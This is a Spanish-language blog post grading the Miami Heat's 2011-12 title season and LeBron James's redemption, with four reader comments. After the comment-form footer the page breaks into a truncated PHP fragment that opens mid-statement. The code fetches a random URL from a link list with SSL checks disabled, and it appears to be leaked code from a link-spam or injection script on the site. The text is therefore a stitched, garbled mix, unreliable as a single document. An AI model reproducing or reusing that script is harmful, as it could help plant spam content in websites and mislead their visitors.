Miami Heat: Sobresaliente

06 de August de 2012 por TheDeerHunter

“Dicen que a la tercera va la vencida.”

Así concluía Sancho su análisis de hace muchos meses, mostrando un ojo clínico extraordinario. No sólo casi fusilaba el balance que los Heat iban a terminar firmando (nuestro compañero se aventuraba con un 47-19 errando únicamente en una victoria) sino que mostraba una fe ciega en la consecución del campeonato. Su alusión a “la tercera” lógicamente venía a cuento referida a un nombre propio, LeBron James, que ha logrado vencer a todos sus rivales, a sí mismo y a la maldición de Dan Gilbert. La temporada 2011-12 será recordada, por encima de todas las demás cosas, como la del primer anillo de ‘King’ James.

La historia de la liga, o mejor dicho, la historia del deporte es fundamentalmente superación. La gloria y la trascendencia, representadas aquí por el anillo, van directamente relacionadas con la extrema dificultad de lograrlo.

El anillo de la 2011-12 se empezó a fraguar en la cabeza de un James hundido tras la confirmación de la derrota ante Dallas. En demasiadas ocasiones tendemos a olvidar la humanidad que reside dentro de esos seres sobrehumanos que manejan el juego. Cuántos no pueden soportar esa exposición, ese nivel de exigencia, la presión. Con LeBron hemos atravesado todos los límites imaginables

La historia va de esto. De caer y levantarse. Un simple tópico tan fácil de decir pero que sólo unos pocos lo consiguen. No es suficiente con tener unas condiciones físicas perfectas, en apariencia diseñadas genéticamente para hacer esto. No es suficiente una potencia imparable unida a un talento descomunal. No es suficiente haber sido el más valioso/dominante o unirse a los mejores talentos que el dinero pueda comprar. No es suficiente ser Dios disfrazado de jugador de baloncesto. La línea entre la gloria y el drama es extremadamente fina. A nadie debería sorprender que ahora mismo estuviéramos escribiendo otra cosa.

Así que LeBron y los Heat, con una marcha más que en el curso anterior y un punto superior de cohesión y experiencia, apenas perdieron dos partidos seguidos en alguna ocasión en la regular (a excepción de una mini-crisis en enero con 3 derrotas consecutivas, dos de ellas en la prórroga) pero no les daba para igualar balances con Chicago u Oklahoma. Lebron, no obstante, era coronado con su tercer MVP con merecimiento y Wade parecía asimilar definitivamente su condición de gregario de superlujo. ¿Camino de rosas?

Chris Bosh caía lesionado justo cuando comenzaba la hora de la verdad. Confieso que en ese punto personalmente no daba un duro por ellos. No es que Bosh haya sido un titán desde que llegó a Florida pero no imaginaba que un juego interior donde podía pelear puesto la panadera de debajo de mi casa podía llegar a buen puerto. Obviamente me equivocaba.

Primera ronda cómoda, contra unos Knicks que bastante tienen con lo suyo. Segunda contra unos Pacers muy bien armados. Fue ahí cuando todo estuvo en un tris de saltar por los aires, con 1-2 y Wade perdiendo los papeles. Lejos de mostrar esa teórica “canguela” que le había llevado al fracaso antaño LeBron se mostró como más líder que nunca. El 40/18/9 del 4º partido es de otra época (Baylor, 1961). El nivel defensivo de LeBron y su capacidad para reconectar a sus compañeros no aparecen reflejados en los box-score. La serie se finiquitaba incluso con cierta comodidad a pesar del intento de los Pacers de llevarla a otro plano.

Pero si queremos emociones fuertes no hay nada como loa Celtics, el equipo anti-LeBron por antonomasia. Más aún… un 2-3 en contra para evitar la eliminación en Boston. En este punto sobran las palabras.

El resto es historia. El camino al título suena casi a paseo militar. Con el único interludio de la derrota en el primero en Oklahoma sólo quedaban victorias, con LeBron en una especie de mix Magic-Chamberlain-Jordan-Bird todo en uno. El esperado duelo vs Durant fue claro. Durant puede anotar tanto o más que LeBron pero no puede defender ni generar juego como él. LeBron es el mejor del mundo oficialmente. Larga vida al rey.

Lo mejor: La redención total de ‘King’ James. El digno papel secundario de Wade. La aportación de la intendencia, especialmente de Battier.

Lo peor: La escenita de Wade perdiendo los papeles. La sensación perenne de que Bosh sobra.

Jugando a GM:

Poco que añadir a estas alturas. Interesantes incorporaciones de Ray Allen y Rashard Lewis a poco que muestren parte del baloncesto que llevan dentro. Por decir algo, quizás podría haber sido un buen momento para buscar salida a Chris Bosh.

Comenta

4 comentarios a esta entrada

  1. Esteban dice:
    #1

    comparto el analisis a pleno, cuesta digerir lo que vale un anillo NBA, a muchos les paso con dirk el año pasado y a mi con lebron, de odiarlo, de disfrutar de sus fracasos, de critifarlo por todo, a casi amarlo, un grande entre los grandes, que de seguir asi 4 años mas, dejara en verguenza a BIRD y sera el mejor 3 de la historia

    larga vida al rey

      Citar

  2. Vader dice:
    #2

    Si Bird hubiera tenido el fisico de LeBron hubiera sido el n1 de todos los tiempos… Y aún con su físico lo prefiero a LeBron.

      Citar

  3. Esteban dice:
    #3

    vader amigo, sobre supuestos es facil, si magic no hubiese tenido sida, si jordan no se hubiese retirado, si sahq hubiese sido mas profesional, etc etc

    las cosas se dan como se dan, y yo en lo profundo de mi corazon, aunque me duela aceptarlo, lo prefiero a lebron, pocas veces eh visto un defensor asi, realmente asusta, y ensima asiste como base y anota como goleador, en fin, completo

      Citar

  4. simon dice:
    #4

    Vader, Esteban tiene toda la razon si nos ponemos a decir y si… cada jugador tiene sus circunstancias, su fisico y su epoca, puede que te guste mas este u otro pero decir si este hubiera tenido el fisico de no se quien… si Jordan hubiera tenido el fisico… yo que se de Adam Morrison pues que sería? o si Jabbar hubiera medido 1.90? o si Shaq en vez de pesar 150 y ser tan rapido como era pesara 100 y fuera lento pues en la zona se lo hubieran comido… y asi un monton de ejemplos que podemos empezar a poner que no sirven de nada.
    Lebron si sigue a este ritmo y suma uno o dos anillos mas en los proximos 3-5 años ( con algun que otro MVP por el camino ) creo que no habrá debate alguno sobre el mejor 3 de la historia. Por cierto sigo en las mias y digo que a partir de la temporada que viene vamos a ver un Lebron ( Muchiiisimo ) mejor de lo que hemos visto ahora sin el “sambenito” de ser un jugador poco resolutivo y sin anillo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>